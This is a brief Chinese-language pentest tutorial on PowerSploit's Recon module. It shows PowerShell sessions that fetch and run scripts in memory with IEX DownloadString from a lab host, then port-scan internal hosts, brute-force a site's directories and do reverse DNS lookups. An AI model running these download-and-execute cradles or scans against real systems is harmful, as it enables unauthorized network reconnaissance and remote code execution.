POWERSPLOIT-Recon(信息侦察)脚本渗透实战

Recon(信息侦察)模块

 

a) 调用invoke-Portscan扫描内网主机的端口。

1）通过IEX下载并调用invoke-portscan。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-Portscan.ps1")

 

PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"

 

 

 

 

 

b) 调用Get-HttpStatus扫描目标站点的目录。

1）通过IEX下载并调用Get-HttpStatus。

 

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht
tpStatus.ps1")

 

 

PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt

 

c) 调用Invoke-ReverseDnsLookup扫描内网主机的ip对应的主机名。

1）通过IEX下载并调用Invoke-ReverseDnsLookup。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-ReverseDnsLookup.ps1")

PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'